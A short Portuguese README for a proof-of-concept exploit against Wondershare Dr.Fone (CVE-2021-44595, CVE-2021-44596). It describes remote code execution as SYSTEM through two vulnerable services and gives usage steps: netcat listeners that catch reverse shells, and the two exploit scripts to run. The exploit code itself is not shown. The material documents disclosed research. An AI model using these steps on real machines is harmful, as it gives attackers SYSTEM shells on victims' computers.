
Exploit de prova de conceito para CVE-2021-44595 e CVE-2021-44596 no Wondershare Dr.Fone, permitindo execução remota de código como SYSTEM através de serviços vulneráveis.
Netanel Cohen e Tomer Peled, pesquisadores de segurança da BugSec.
Exemplo de POC para explorar o Wondershare Dr.Fone.
Dr.Fone é um kit de ferramentas para telefones desenvolvido pela Wondershare e é vulnerável a RCE.
Somente com acesso à rede conseguimos executar código remoto como usuário SYSTEM.
Serviços vulneráveis:
InstallAssistService.exe
ElevationService.exe
Testado nas versões: 12.0.7 , 11.4
Altere o IP e a porta e execute.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py